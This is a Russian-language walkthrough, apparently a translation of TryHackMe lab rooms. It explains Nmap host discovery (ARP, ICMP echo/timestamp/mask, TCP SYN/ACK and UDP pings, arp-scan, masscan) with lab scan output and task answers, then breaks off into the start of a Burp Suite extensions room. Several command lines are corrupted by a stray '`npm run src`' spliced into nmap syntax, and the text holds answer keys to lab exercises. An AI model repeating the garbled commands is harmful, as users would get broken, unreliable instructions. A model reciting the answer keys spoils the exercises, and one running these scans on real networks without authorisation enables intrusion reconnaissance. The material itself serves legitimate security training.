В этом разделе объясняется, какие шаги предпринимает Nmap для обнаружения работающих систем перед сканированием портов. Этот этап имеет решающее значение, поскольку попытка сканирования портов офлайн-систем приведет лишь к пустой трате времени и созданию ненужного сетевого шума.

Мы представляем различные подходы, которые Nmap использует для обнаружения активных хостов. В частности, мы рассматриваем:

ARP- сканирование : это сканирование использует ARP- запросы для обнаружения активных хостов.
ICMP-сканирование : это сканирование использует ICMP-запросы для идентификации активных хостов.
Сканирование TCP / UDP с помощью команды ping : это сканирование отправляет пакеты на TCP- и UDP- порты для определения активных хостов.

Мы также представляем два сканера, arp-scanи masscan, и объясняем, как они пересекаются с частью механизма обнаружения хостов Nmap .

Предварительные условия обучения

В следующем задании давайте углубимся в изучение некоторых важных концепций, прежде чем приступать к поиску работающих хостов.

Task 2. Subnetworks

Прежде чем перейти к основным задачам, давайте повторим несколько терминов. Сетевой сегмент — это группа компьютеров, соединенных с помощью общей среды передачи данных. Например, средой передачи может быть коммутатор Ethernet или точка доступа Wi-Fi. В IP-сети подсеть обычно представляет собой один или несколько сетевых сегментов, соединенных вместе и настроенных на использование одного и того же маршрутизатора. Сетевой сегмент обозначает физическое соединение, а подсеть — логическое соединение.

На приведенной ниже сетевой схеме представлены четыре сетевых сегмента или подсети. В общем, ваша система будет подключена к одному из этих сетевых сегментов/подсетей. Подсеть, или просто подсеть, имеет свой собственный диапазон IP-адресов и подключается к более обширной сети через маршрутизатор. В зависимости от сети может быть установлен брандмауэр, обеспечивающий соблюдение политик безопасности.

На рисунке выше показаны два типа подсетей:

Подсети с маской подсети /16, что означает, что маска подсети может быть записана как 255.255.0.0. Эта подсеть может вместить около 65 000 хостов.
Подсети с /24, что указывает на возможность выражения маски подсети как 255.255.255.0. Такая подсеть может содержать около 250 хостов.

Если вам нужно узнать больше о подсетях, вы можете обратиться к заданию 2 в комнате «Введение в локальные сети» .

В рамках активной разведки мы хотим получить больше информации о группе хостов или о подсети. Если вы находитесь в одной подсети, вы ожидаете, что ваш сканер будет использовать запросы ARP (Address Resolution Protocol ) для обнаружения активных хостов. Цель запроса ARP — получить аппаратный адрес (MAC-адрес), чтобы обеспечить связь на канальном уровне; однако мы можем предположить, что хост находится в сети. (Мы вернемся к канальному уровню в Задании 4.)

Если вы находитесь в сети A, вы можете использовать ARP только для обнаружения устройств в этой подсети (10.1.100.0/24). Предположим, вы подключены к подсети, отличной от подсети целевой системы (систем). В этом случае все пакеты, генерируемые вашим сканером, будут маршрутизироваться через шлюз по умолчанию (маршрутизатор) для достижения систем в другой подсети; однако ARP- запросы не будут маршрутизироваться и, следовательно, не смогут пройти через маршрутизатор подсети. ARP — это протокол канального уровня, и ARP- пакеты привязаны к своей подсети.

Нажмите кнопку «Просмотреть сайт», чтобы запустить сетевой симулятор. Мы будем использовать этот симулятор для ответа на вопросы заданий 2, 4 и 5.

Вопрос: Сколько устройств могут увидеть ARP-запрос?

Ответ: 4

Вопрос: Получил ли компьютер 6 ARP-запрос? (Да/Нет)

Ответ: N

Вопрос: Отправьте пакет со следующим содержимым:

С компьютера4
Для компьютера 4 (чтобы указать, что это трансляция)
Тип пакета: «ARP-запрос»
Данные: computer6 (поскольку мы запрашиваем MAC-адрес компьютера computer6 с помощью ARP-запроса)

Сколько устройств могут увидеть ARP-запрос?

Ответ: 4

Вопрос: Ответил ли компьютер 6 на ARP-запрос? (Да/Нет)

Ответ: Yea

Task 3. Enumerating Targets

В задании 1 мы упомянули различные методы сканирования. Прежде чем подробно объяснить каждый из них и протестировать на реальном объекте, необходимо указать объекты, которые мы хотим сканировать. Как правило, можно указать список, диапазон или подсеть. Примеры указания объектов:

список: MACHINE_IP scanme.nmap.org example.comбудет просканировано 3 IP-адреса.
диапазон: 10.11.12.15-20будет просканировано 6 IP-адресов: 10.11.12.15, 10.11.12.16,… и 10.11.12.20.
Подсеть: MACHINE_IP/30будет просканировано 4 IP-адреса.

Вы также можете указать файл в качестве входных данных для списка целей nmap -iL list_of_hosts.txt.

Если вы хотите проверить список хостов, которые будет сканировать Nmap , вы можете использовать опцию ` nmap -sL TARGETS--`. Эта опция предоставляет подробный список хостов, которые будет сканировать Nmap, без фактического сканирования; однако Nmap попытается выполнить обратное разрешение DNS для всех целей, чтобы получить их имена. Имена могут раскрыть различную информацию для пентестера. (Если вы не хотите, чтобы Nmap обращался к DNS-серверу, вы можете добавить ` -n--`.)

Запустите AttackBox, используя Start AttackBoxкнопку ниже. После открытия в режиме разделенного экрана откройте окно Terminalи используйте его Nmapдля ответа на следующие вопросы.

Вопрос: Какой IP-адрес Nmap просканирует первым, если вы укажете 10.10.12.13/29 его в качестве целевого адреса?

Ответ: 10.10.12.8

Вопрос: Сколько IP-адресов просканирует Nmap, если вы укажете следующий диапазон 10.10.0-255.101-125?

Ответ: 6400

Task 4. Discovering Live Hosts

Давайте вернемся к уровням TCP /IP, показанным на следующем рисунке. Мы будем использовать эти протоколы для обнаружения активных хостов. Начиная снизу вверх, мы можем использовать:

ARP с канального уровня
ICMP с сетевого уровня
TCP с транспортного уровня
UDP с транспортного уровня

Прежде чем подробно обсуждать, как можно использовать каждый сканер, мы кратко рассмотрим эти четыре протокола. ARP имеет одну цель: отправить кадр на широковещательный адрес в сетевом сегменте и запросить у компьютера с определенным IP-адресом ответ, предоставив его MAC-адрес (аппаратный адрес).

ICMP имеет множество типов . ICMP-запрос ping использует тип 8 (эхо) и тип 0 (эхо-ответ).

Если вы хотите отправить ping-запрос системе, находящейся в той же подсети, перед ICMP-эхо-запросом следует выполнить ARP- запрос.

Хотя TCP и UDP являются протоколами транспортного уровня, для сканирования сети сканер может отправить специально сформированный пакет на распространенные порты TCP или UDP , чтобы проверить, отвечает ли целевой сервер. Этот метод эффективен, особенно когда блокируется ICMP Echo.

Если вы закрыли сетевой симулятор, нажмите View Siteкнопку « » Task 2для его повторного отображения.

Отправьте пакет со следующим содержимым:

С компьютера1
На компьютер3
Тип пакета: « Запрос Ping »

Вопрос: Какой тип пакета отправил компьютер 1 перед пингом?

Ответ: ARP Request

Вопрос: Какой тип пакета получил компьютер 1 , прежде чем смог отправить пинг?

Ответ: ARP Response

Вопрос: Сколько компьютеров ответили на запрос ping?

Ответ: 1

Вопрос:

Отправьте пакет со следующим содержимым:

С компьютера2
На компьютер5
Тип пакета: « Запрос Ping »

Как называется первое устройство, ответившее на первый ARP-запрос?

Ответ: router

Вопрос: Как называется первое устройство, ответившее на второй ARP-запрос?

Ответ: computer5

Вопрос: Отправьте еще один запрос Ping. Потребовались ли новые запросы ARP? (да/нет)

Ответ: nay

Task 5. Nmap Host Discovery Using ARP

Как узнать, какие хосты работают? Крайне важно избегать траты времени на сканирование портов неактивных хостов или IP-адресов, которые не используются. Существуют различные способы обнаружения работающих хостов. Если параметры обнаружения хостов отсутствуют, Nmap использует следующие подходы для обнаружения активных хостов:

Когда привилегированный пользователь пытается сканировать цели в локальной сети (Ethernet), Nmap использует ARP- запросы . Привилегированным пользователем считается rootпользователь, принадлежащий к группе sudoersи имеющий право запускать соответствующие программы sudo.
Когда привилегированный пользователь пытается сканировать цели за пределами локальной сети, Nmap использует запросы эхо ICMP, подтверждение TCP ACK (Acknowledge) на порт 80, синхронизацию TCP SYN (Synchronize) на порт 443 и запрос метки времени ICMP.
Когда непривилегированный пользователь пытается сканировать цели за пределами локальной сети, Nmap прибегает к трехстороннему TCP-рукопожатию, отправляя SYN-пакеты на порты 80 и 443.

По умолчанию Nmap использует сканирование с помощью команды ping для поиска активных хостов, а затем продолжает сканирование только активных хостов. Если вы хотите использовать Nmap для обнаружения онлайн-хостов без сканирования портов активных систем, вы можете выполнить команду nmap -sn TARGETS. Давайте разберемся подробнее, чтобы получить полное представление о различных используемых методах.

Сканирование ARP возможно только в том случае, если вы находитесь в той же подсети, что и целевые системы. В сетях Ethernet (802.3) и WiFi (802.11) необходимо знать MAC-адрес любой системы, прежде чем вы сможете с ней взаимодействовать. MAC-адрес необходим для заголовка канального уровня; он содержит MAC-адреса источника и назначения, а также другие поля. Чтобы получить MAC-адрес, операционная система отправляет ARP-запрос. Хост, отвечающий на ARP-запросы, считается активным. ARP-запрос работает только в том случае, если целевая система находится в той же подсети, что и вы, то есть в той же сети Ethernet/Wi-Fi. Во время сканирования локальной сети с помощью Nmap следует ожидать появления множества ARP-запросов. Если вы хотите, чтобы Nmap выполнял только сканирование ARP без сканирования портов, вы можете использовать команду `npm run src` nmap -PR -sn TARGETS, где ` -PRnpm run src` указывает, что вам нужно только сканирование ARP. В следующем примере показано, как Nmap использует ARP для обнаружения хостов без сканирования портов. Мы запускаем команду `npm run src` nmap -PR -sn MACHINE_IP/24для обнаружения всех активных систем в той же подсети, что и наша целевая машина.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PR -sn 10.10.210.6/24

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-02 07:12 BST
Nmap scan report for ip-10-10-210-75.eu-west-1.compute.internal (10.10.210.75)
Host is up (0.00013s latency).
MAC Address: 02:83:75:3A:F2:89 (Unknown)
Nmap scan report for ip-10-10-210-100.eu-west-1.compute.internal (10.10.210.100)
Host is up (-0.100s latency).
MAC Address: 02:63:D0:1B:2D:CD (Unknown)
Nmap scan report for ip-10-10-210-165.eu-west-1.compute.internal (10.10.210.165)
Host is up (0.00025s latency).
MAC Address: 02:59:79:4F:17:B7 (Unknown)
Nmap scan report for ip-10-10-210-6.eu-west-1.compute.internal (10.10.210.6)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.12 seconds

В данном случае, AttackBoxимея IP-адрес 10.10.210.6, Nmap использовал ARP-запросы для обнаружения активных хостов в той же подсети. ARP-сканирование работает, как показано на рисунке ниже. Nmap отправляет ARP-запросы всем целевым компьютерам, и те, которые находятся в сети, должны ответить ARP-ответом.

Если мы посмотрим на пакеты, сгенерированные с помощью таких инструментов, как tcpdump или Wireshark, мы увидим сетевой трафик, похожий на показанный ниже. На рисунке ниже Wireshark отображает MAC-адреса источника и назначения, протокол и запрос для каждого ARP-запроса. Адрес источника — это MAC-адрес нашего AttackBox, а адрес назначения — широковещательный адрес, поскольку MAC-адрес цели нам неизвестен. Однако IP-адрес цели можно увидеть в столбце Info. На рисунке видно, что мы запрашиваем MAC-адреса всех IP-адресов в подсети, начиная с 10.10.210.1. Хост с запрашиваемым IP-адресом отправит ARP- ответ со своим MAC-адресом, и именно так мы узнаем, что он находится в сети.

Говоря о сканировании ARP , следует упомянуть сканер, построенный на основе ARP- запросов: arp-scan; он предоставляет множество опций для настройки сканирования. Для получения подробной информации посетите вики-страницу arp -scan . Один из популярных вариантов — arp-scan --localnetили просто arp-scan -l. Эта команда отправит ARP- запросы на все действительные IP-адреса в вашей локальной сети. Более того, если ваша система имеет более одного интерфейса и вы заинтересованы в обнаружении активных хостов на одном из них, вы можете указать интерфейс с помощью -I. Например, sudo arp-scan -I eth0 -lотправит ARP- запросы на все действительные IP-адреса на этом eth0интерфейсе.

Обратите внимание, что arp-scanон не установлен на AttackBox; однако его можно установить с помощью apt install arp-scan.

В приведенном ниже примере мы просканировали подсеть AttackBox с помощью arp-scan ATTACKBOX_IP/24. Поскольку мы выполнили это сканирование в промежутке времени, близком к предыдущему nmap -PR -sn ATTACKBOX_IP/24, мы получили те же три активные цели.

Терминал пентестера

pentester@TryHackMe$ sudo arp-scan 10.10.210.6/24
Interface: eth0, datalink type: EN10MB (Ethernet)
WARNING: host part of 10.10.210.6/24 is non-zero
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.10.210.75	02:83:75:3a:f2:89	(Unknown)
10.10.210.100	02:63:d0:1b:2d:cd	(Unknown)
10.10.210.165	02:59:79:4f:17:b7	(Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.726 seconds (93.91 hosts/sec). 3 responded

Аналогичным образом, команда arp-scanсгенерирует множество ARP- запросов, которые мы можем просмотреть с помощью tcpdump, Wireshark или аналогичного инструмента. Мы можем заметить, что захват пакетов arp-scanпоказывает nmap -PR -snсхожие закономерности трафика. Ниже приведен вывод Wireshark.

Если вы закрыли сетевой симулятор, нажмите Visit Siteкнопку « » в задании 2, чтобы снова открыть его.

Вопрос:

Мы будем отправлять широковещательные ARP-запросы со следующими параметрами:

С компьютера1
Компьютеру 1 (чтобы указать, что это трансляция)
Тип пакета: «ARP-запрос»
Данные: попробуйте все 8 устройств (кроме компьютера 1) в сети: компьютер 2 , компьютер 3 , компьютер 4 , компьютер 5 , компьютер 6 , коммутатор 1 , коммутатор 2 и маршрутизатор.

Сколько устройств можно обнаружить с помощью ARP-запросов?

Ответ: 3

Task 6. Nmap Host Discovery Using ICMP

Мы можем отправить ping-запрос на каждый IP-адрес в целевой сети и посмотреть, кто ответит на наши pingзапросы (ICMP Type 8/Echo) ответным ping-запросом (ICMP Type 0). Просто, не правда ли? Хотя это был бы самый простой подход, он не всегда надежен. Многие брандмауэры блокируют ICMP-эхо-запросы; в новых версиях MS Windows настроен брандмауэр хоста, который по умолчанию блокирует запросы ICMP-эхо. Помните, что ARP-запрос предшествует ICMP-запросу, если ваша цель находится в той же подсети.

Чтобы использовать ICMP-запрос эхо-ответа для обнаружения активных хостов, добавьте опцию -PE. (Не забудьте добавить её, -snесли вы не хотите после этого выполнять сканирование портов.)

Как показано на следующем рисунке, сканирование ICMP echo отправляет запрос ICMP echo и ожидает, что целевой объект ответит ответом ICMP echo, если он находится в сети.

В приведенном ниже примере мы просканировали подсеть целевого объекта с помощью команды `npm run src` nmap -PE -sn MACHINE_IP/24. Это сканирование отправит эхо-пакеты ICMP на каждый IP-адрес в подсети. Мы ожидаем ответа от работающих хостов; однако следует помнить, что многие брандмауэры блокируют ICMP. В приведенном ниже выводе показан результат сканирования подсети класса C виртуальной машины с помощью команды `npm run src` sudo nmap -PE -sn MACHINE_IP/24из AttackBox.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PE -sn 10.10.68.220/24

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-02 10:16 BST
Nmap scan report for ip-10-10-68-50.eu-west-1.compute.internal (10.10.68.50)
Host is up (0.00017s latency).
MAC Address: 02:95:36:71:5B:87 (Unknown)
Nmap scan report for ip-10-10-68-52.eu-west-1.compute.internal (10.10.68.52)
Host is up (0.00017s latency).
MAC Address: 02:48:E8:BF:78:E7 (Unknown)
Nmap scan report for ip-10-10-68-77.eu-west-1.compute.internal (10.10.68.77)
Host is up (-0.100s latency).
MAC Address: 02:0F:0A:1D:76:35 (Unknown)
Nmap scan report for ip-10-10-68-110.eu-west-1.compute.internal (10.10.68.110)
Host is up (-0.10s latency).
MAC Address: 02:6B:50:E9:C2:91 (Unknown)
Nmap scan report for ip-10-10-68-140.eu-west-1.compute.internal (10.10.68.140)
Host is up (0.00021s latency).
MAC Address: 02:58:59:63:0B:6B (Unknown)
Nmap scan report for ip-10-10-68-142.eu-west-1.compute.internal (10.10.68.142)
Host is up (0.00016s latency).
MAC Address: 02:C6:41:51:0A:0F (Unknown)
Nmap scan report for ip-10-10-68-220.eu-west-1.compute.internal (10.10.68.220)
Host is up (0.00026s latency).
MAC Address: 02:25:3F:DB:EE:0B (Unknown)
Nmap scan report for ip-10-10-68-222.eu-west-1.compute.internal (10.10.68.222)
Host is up (0.00025s latency).
MAC Address: 02:28:B1:2E:B0:1B (Unknown)
Nmap done: 256 IP addresses (8 hosts up) scanned in 2.11 seconds

Результаты сканирования показывают, что активны 8 хостов, а также их MAC-адреса. Как правило, мы не ожидаем узнать MAC-адреса целевых устройств, если они не находятся в той же подсети, что и наша система. Приведенные выше данные указывают на то, что Nmap не потребовалось отправлять ICMP-пакеты, поскольку он подтвердил активность этих хостов на основе полученных ARP-ответов.

Мы повторим описанное выше сканирование; однако на этот раз мы будем сканировать с системы, находящейся в другой подсети. Результаты будут аналогичными, но без MAC-адресов.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PE -sn 10.10.68.220/24

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 12:16 EEST
Nmap scan report for 10.10.68.50
Host is up (0.12s latency).
Nmap scan report for 10.10.68.52
Host is up (0.12s latency).
Nmap scan report for 10.10.68.77
Host is up (0.11s latency).
Nmap scan report for 10.10.68.110
Host is up (0.11s latency).
Nmap scan report for 10.10.68.140
Host is up (0.11s latency).
Nmap scan report for 10.10.68.142
Host is up (0.11s latency).
Nmap scan report for 10.10.68.220
Host is up (0.11s latency).
Nmap scan report for 10.10.68.222
Host is up (0.11s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 8.26 seconds

Если вы проанализируете сетевые пакеты с помощью такого инструмента, как Wireshark, вы увидите нечто похожее на изображение ниже. Вы можете заметить, что у нас есть один исходный IP-адрес в другой подсети, чем целевая подсеть, и мы отправляем запросы ICMP echo всем IP-адресам в целевой подсети, чтобы узнать, кто ответит.

Поскольку запросы ICMP echo обычно блокируются, вы также можете рассмотреть запросы ICMP Timestamp или ICMP Address Mask, чтобы определить, находится ли система в сети. Nmap использует запрос временной метки (ICMP Type 13) и проверяет, получит ли он ответ с временной меткой (ICMP Type 14). Добавление этой -PPопции указывает Nmap использовать запросы ICMP временной метки. Как показано на рисунке ниже, вы ожидаете ответа от активных хостов.

В следующем примере мы запускаем команду nmap -PP -sn MACHINE_IP/24для обнаружения компьютеров, находящихся в сети в целевой подсети.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PP -sn 10.10.68.220/24

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 12:06 EEST
Nmap scan report for 10.10.68.50
Host is up (0.13s latency).
Nmap scan report for 10.10.68.52
Host is up (0.25s latency).
Nmap scan report for 10.10.68.77
Host is up (0.14s latency).
Nmap scan report for 10.10.68.110
Host is up (0.14s latency).
Nmap scan report for 10.10.68.140
Host is up (0.15s latency).
Nmap scan report for 10.10.68.209
Host is up (0.14s latency).
Nmap scan report for 10.10.68.220
Host is up (0.14s latency).
Nmap scan report for 10.10.68.222
Host is up (0.14s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 10.93 seconds

Аналогично предыдущему сканированию ICMP, это сканирование отправит множество запросов ICMP с временной меткой на каждый действительный IP-адрес в целевой подсети. На скриншоте Wireshark ниже вы можете увидеть, как один исходный IP-адрес отправляет пакеты ICMP на каждый возможный IP-адрес для обнаружения работающих хостов.

Аналогично, Nmap использует запросы маски адреса (ICMP типа 17) и проверяет, получает ли он ответ с маской адреса (ICMP типа 18). Это сканирование можно включить с помощью опции -PM. Как показано на рисунке ниже, ожидается, что активные хосты будут отвечать на запросы ICMP с маской адреса.

В попытке обнаружить активные хосты с помощью запросов ICMP-адресной маски мы запускаем команду nmap -PM -sn MACHINE_IP/24. Хотя предыдущие сканирования показали, что активны как минимум 8 хостов, это сканирование не дало результатов. Причина в том, что целевая система или межсетевой экран на маршруте блокируют этот тип ICMP-пакетов. Поэтому важно изучить несколько подходов для достижения одного и того же результата. Если блокируется один тип пакетов, мы всегда можем выбрать другой для обнаружения целевой сети и служб.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PM -sn 10.10.68.220/24

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 12:13 EEST
Nmap done: 256 IP addresses (0 hosts up) scanned in 52.17 seconds

Хотя мы не получили никакого ответа и не смогли определить, какие хосты были в сети, важно отметить, что в ходе сканирования были отправлены запросы ICMP с маской адреса на каждый действительный IP-адрес, и ожидался ответ. Каждый запрос ICMP был отправлен дважды, как показано на скриншоте ниже.

Вопрос: Какая опция необходима, чтобы указать Nmap использовать метку времени ICMP для обнаружения активных хостов?

Ответ: -PP

Вопрос: Какая опция необходима, чтобы указать Nmap использовать маску ICMP-адреса для обнаружения активных хостов?

Ответ: -PM

Вопрос: Какая опция необходима, чтобы указать Nmap использовать ICMP Echo для обнаружения активных хостов?

Ответ: -PE

Task 7. Nmap Host Discovery Using TCP and UDP

TCP SYN Ping

Мы можем отправить пакет с установленным флагом SYN (синхронизация) на TCP- порт (по умолчанию 80) и дождаться ответа. Открытый порт должен ответить SYN/ACK (подтверждение); закрытый порт приведет к RST (сброс). В этом случае мы проверяем только наличие ответа, чтобы определить, активен ли хост. Конкретное состояние порта здесь не имеет значения. Рисунок ниже напоминает о том, как обычно работает трехстороннее рукопожатие TCP .

Если вы хотите, чтобы Nmap использовал TCP SYN ping, вы можете сделать это с помощью опции, -PSза которой следует номер порта, диапазон, список или их комбинация. Например, -PS21будет нацелен на порт 21, в то время как -PS21-25будет нацелен на порты 21, 22, 23, 24 и 25. Наконец, -PS80,443,8080будет нацелен на три порта: 80, 443 и 8080.

Привилегированные пользователи (root и sudo) могут отправлять пакеты TCP SYN и не обязаны завершать трехстороннее рукопожатие TCP, даже если порт открыт, как показано на рисунке ниже. Непривилегированные пользователи вынуждены завершать трехстороннее рукопожатие, если порт открыт.

Мы запустим nmap -PS -sn MACHINE_IP/24сканирование целевой подсети виртуальных машин. Как показано в приведенном ниже выводе, мы обнаружили пять хостов.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PS -sn 10.10.68.220/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 13:45 EEST
Nmap scan report for 10.10.68.52
Host is up (0.10s latency).
Nmap scan report for 10.10.68.121
Host is up (0.16s latency).
Nmap scan report for 10.10.68.125
Host is up (0.089s latency).
Nmap scan report for 10.10.68.134
Host is up (0.13s latency).
Nmap scan report for 10.10.68.220
Host is up (0.11s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 17.38 seconds

Давайте подробнее рассмотрим, что происходило за кулисами, изучив сетевой трафик в Wireshark на рисунке ниже. Технически говоря, поскольку мы не указывали никаких TCP-портов для использования в сканировании TCP ping, Nmap использовал TCP-порт по умолчанию, 80. Ожидается, что любая служба, прослушивающая порт 80, ответит, косвенно указывая на то, что хост находится в сети.

TCP ACK Пинг

Как вы уже догадались, это отправляет пакет с установленным флагом ACK. Для этого необходимо запускать Nmap от имени привилегированного пользователя. Если вы попытаетесь сделать это от имени непривилегированного пользователя, Nmap попытается выполнить трехстороннее рукопожатие.

По умолчанию используется порт 80. Синтаксис аналогичен TCP SYN ping. -PAдолжен сопровождаться номером порта, диапазоном номеров портов, списком или их комбинацией. Например, рассмотрим -PA21, -PA21-25и -PA80,443,8080. Если порт не указан, будет использоваться порт 80.

На следующем рисунке показано, что любой TCP-пакет с установленным флагом ACK должен получить ответ в виде TCP-пакета с RSTустановленным флагом. Целевой хост отвечает с RSTустановленным флагом, поскольку TCP-пакет с флагом ACK не является частью какого-либо текущего соединения. Ожидаемый ответ используется для определения того, активен ли целевой хост.

В этом примере мы запускаем sudo nmap -PA -sn MACHINE_IP/24проверку доступности хостов в подсети целевого объекта. Мы видим, что сканирование TCP ACK ping обнаружило пять хостов как активных.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PA -sn 10.10.68.220/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 13:46 EEST
Nmap scan report for 10.10.68.52
Host is up (0.11s latency).
Nmap scan report for 10.10.68.121
Host is up (0.12s latency).
Nmap scan report for 10.10.68.125
Host is up (0.10s latency).
Nmap scan report for 10.10.68.134
Host is up (0.10s latency).
Nmap scan report for 10.10.68.220
Host is up (0.10s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 29.89 seconds

Если мы взглянем на сетевой трафик, как показано на рисунке ниже, мы обнаружим множество пакетов с установленным флагом ACK, отправленных на порт 80 целевых систем. Nmap отправляет каждый пакет дважды. Системы, которые не отвечают, находятся в автономном режиме или недоступны.

UDP Пинг

Наконец, мы можем использовать UDP для определения того, находится ли хост в сети. В отличие от TCP SYN ping, отправка UDP-пакета на открытый порт, как правило, не приводит к ответу. Однако, если мы отправим UDP-пакет на закрытый UDP-порт, мы ожидаем получить ICMP-пакет "порт недоступен"; это указывает на то, что целевая система активна и доступна.

На следующем рисунке показан UDP-пакет, отправленный на открытый UDP-порт, который не вызывает никакой реакции. Однако отправка UDP-пакета на любой закрытый UDP-порт может вызвать реакцию, косвенно указывающую на то, что целевой объект находится в сети.

Синтаксис для указания портов аналогичен синтаксису TCP SYN ping и TCP ACK ping; Nmap использует -PUдля UDP ping. В следующем примере мы выполняем сканирование UDP и обнаруживаем пять активных хостов.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PU -sn 10.10.68.220/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 13:45 EEST
Nmap scan report for 10.10.68.52
Host is up (0.10s latency).
Nmap scan report for 10.10.68.121
Host is up (0.10s latency).
Nmap scan report for 10.10.68.125
Host is up (0.14s latency).
Nmap scan report for 10.10.68.134
Host is up (0.096s latency).
Nmap scan report for 10.10.68.220
Host is up (0.11s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.20 seconds

Давайте рассмотрим сгенерированные UDP-пакеты. На следующем скриншоте Wireshark мы видим, что Nmap отправляет UDP-пакеты на UDP-порты, которые, скорее всего, закрыты. На изображении ниже показано, что Nmap использует необычный UDP-порт для запуска ошибки ICMP «недоступен адрес назначения (порт недоступен)».

Масскан

В качестве дополнительной информации следует отметить, что Masscan использует аналогичный подход для обнаружения доступных систем. Однако, чтобы быстро завершить сканирование сети, Masscan довольно агрессивно генерирует пакеты. Синтаксис довольно похож: -pза ним может следовать номер порта, список или диапазон. Рассмотрим следующие примеры:

masscan MACHINE_IP/24 -p443
masscan MACHINE_IP/24 -p80,443
masscan MACHINE_IP/24 -p22-25
masscan MACHINE_IP/24 ‐‐top-ports 100

Masscan не установлен на устройстве AttackBox; однако его можно установить с помощью команды apt install masscan.

Вопрос: Для какого вида сканирования TCP ping не требуется привилегированная учетная запись?

Ответ: TCP SYN Ping

Вопрос: Для какого вида сканирования TCP ping требуется привилегированная учетная запись?

Ответ: TCP ACK Ping

Вопрос: Какую опцию нужно добавить в Nmap, чтобы запустить сканирование TCP/SYN ping на порту telnet?

Ответ: -PS23

Task 8. Using Reverse-DNS Lookup

По умолчанию Nmap использует обратные DNS-запросы к онлайн-хостам. Поскольку имена хостов могут многое рассказать, этот шаг может быть полезным. Однако, если вы не хотите отправлять такие DNS- запросы, вы можете -nпропустить этот шаг.

По умолчанию Nmap выполняет поиск работающих хостов; однако вы можете использовать опцию -Rдля запроса DNS-сервера даже для неработающих хостов. Если вы хотите использовать конкретный DNS-сервер, вы можете добавить соответствующую --dns-servers DNS_SERVER опцию.

Вопрос: Мы хотим, чтобы Nmap выполнил обратный DNS-запрос для всех возможных хостов в подсети, надеясь получить некоторую информацию из имен. Какую опцию нам следует добавить?

Ответ: -R

Task 9. Summary

Пройдя это задание, вы узнали, как ARP , ICMP, TCP и UDP могут обнаруживать активные хосты. Любой ответ от хоста указывает на то, что он находится в сети. Ниже приведено краткое описание параметров командной строки Nmap , которые мы рассмотрели.

День 41. Burp Suite: Extensions

2026-03-04T08:25:48.371Z

Узнайте, как использовать расширения для расширения функциональности Burp Suite.

Задание 1. Введение

Добро пожаловать в комнату расширения Burp Suite!

В этой комнате мы рассмотрим модульные аспекты Burp Suite , сосредоточившись на его открытой функциональности, которая позволяет разработчикам создавать дополнительные модули для фреймворка.

Хотя разработка модулей Burp выходит за рамки данного модуля, мы кратко рассмотрим документацию по API и обсудим типичный процесс добавления новых модулей с помощью Burp Suite BApp Store .

Для прохождения этой комнаты вам не понадобится целевой компьютер, но убедитесь, что у вас есть доступ к Burp Suite . Если вы используете AttackBox, убедитесь, что он запущен, нажав синюю кнопку «Запустить AttackBox» в правом верхнем углу комнаты. Давайте погрузимся в захватывающий мир расширений и расширяемости Burp Suite !

Задание 2. The Extensions Interface

Интерфейс «Расширения» в Burp Suite предоставляет обзор расширений, загруженных в инструмент. Давайте рассмотрим различные компоненты этого интерфейса:

Список расширений : В верхнем поле отображается список расширений, установленных в Burp Suite для текущего проекта. Вы можете активировать или деактивировать отдельные расширения.
Управление расширениями : В левой части интерфейса расширений расположены параметры для управления расширениями:

Добавить : С помощью этой кнопки вы можете установить новые расширения из файлов на вашем диске. Эти файлы могут представлять собой модули, написанные вами самостоятельно, или модули, полученные из внешних источников, которые недоступны в официальном магазине BApp.
Удалить : Эта кнопка позволяет удалить выбранные расширения из Burp Suite .
Кнопки «Вверх/Вниз» : Эти кнопки управляют порядком отображения установленных расширений. Порядок определяет последовательность вызова расширений при обработке трафика. Расширения применяются в порядке убывания, начиная с верхней части списка и двигаясь вниз. Порядок имеет важное значение, особенно при работе с расширениями, изменяющими запросы, поскольку некоторые из них могут конфликтовать или мешать другим.

Подробности, вывод и ошибки : В нижней части окна расположены разделы для выбранного в данный момент расширения:

Подробности : В этом разделе представлена информация о выбранном расширении, такая как его название, версия и описание.
Вывод : Расширения могут выводить информацию во время своего выполнения, и в этом разделе отображаются все соответствующие выходные данные или результаты.
Ошибки : Если во время выполнения расширения возникнут какие-либо ошибки, они будут отображены в этом разделе. Это может быть полезно для отладки и устранения неполадок, связанных с расширением.

Вкратце, интерфейс расширений в Burp Suite позволяет пользователям управлять установленными расширениями и отслеживать их состояние, активировать или деактивировать для конкретных проектов, а также просматривать важные сведения, результаты и ошибки, связанные с каждым расширением. Использование расширений превращает Burp Suite в мощную и настраиваемую платформу для различных задач тестирования безопасности и оценки веб-приложений.

Вопрос: Расширения вызываются в порядке возрастания (A) или убывания (D)?

Ответ: D

Задание 3. The BApp Store

В Burp Suite магазин приложений Burp App Store (BApp Store) позволяет легко находить и беспрепятственно интегрировать официальные расширения в инструмент. Расширения могут быть написаны на различных языках, наиболее распространенными являются Java и Python. Расширения на Java автоматически интегрируются с фреймворком Burp Suite , в то время как для расширений на Python требуется интерпретатор Jython.

